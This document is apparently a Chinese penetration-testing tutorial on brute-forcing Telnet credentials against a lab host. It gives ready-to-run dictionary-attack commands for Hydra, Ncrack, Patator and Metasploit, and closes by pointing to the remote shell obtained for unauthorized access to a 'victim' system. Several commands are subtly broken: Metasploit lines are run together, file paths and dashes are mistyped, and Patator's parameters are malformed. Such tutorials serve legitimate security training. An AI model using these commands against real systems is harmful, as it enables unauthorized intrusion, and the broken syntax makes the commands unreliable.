破解Telnet的四种方法

1. Hydra

Hydra 通常是首选工具。它可以对 50 多种协议执行快速字典攻击，包括 telnet、ftp、http、https、smb、多个数据库等等

现在，我们需要选择一个单词列表。与任何字典攻击一样，词表是关键。Kali 内置了许多单词表。

运行以下命令

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.106 telnet

-L：表示用户名列表的路径

-P：表示密码列表的路径

如图所见，我们已成功获取 Telnet用户名xander和密码123。

2. Ncrack

Ncrack是一款高速网络认证破解工具。它旨在通过主动测试其所有主机和网络设备的密码错误来帮助公司保护其网络。

运行以下命令

ncrack -U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106:23

-U：表示用户名列表的路径

-P：表示密码列表的路径

如图所见，我们已成功获取 Telnet用户名xander和密码123。

3. Patator

Patator 是一个多用途的暴力破解工具，具有模块化设计和灵活的使用方式。它对于对 FTP、HTTP、SMB 等多个端口进行暴力攻击非常有用。

patator telnet_login host=192.168.1.106 inputs='FILE0FILE1' 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re='Username: | Password:'

从下面给出的图像中，可以观察到字典攻击的过程开始了，因此将获得受害者的用户名和密码。

4. Metasploit

该模块将在一系列机器上测试 telnet 登录并报告成功登录。如果已加载数据库插件并连接到数据库，此模块将记录成功的登录和主机，以便可以跟踪访问。

打开 Kali 终端类型 msfconsole 现在类型

use auxiliary/scanner/telnet/telnet_loginmsf exploit (telnet_login)>set rhosts 192.168.1.106 (远程主机IP)msf exploit (telnet_login)>set user_file /root/Desktop/user txtmsf exploit (telnet_login)>set pass_file /root/Desktop/pass.txtmsf exploit (telnet_login)>set stop_on_success truemsf exploit (telnet_login)> exploit
从下图可以看出，我们已经成功获取了 telnet 密码和用户名，此外，Metasploit 还提供了一个额外的好处，即提供远程系统命令 shell以未经授权访问受害者的系统。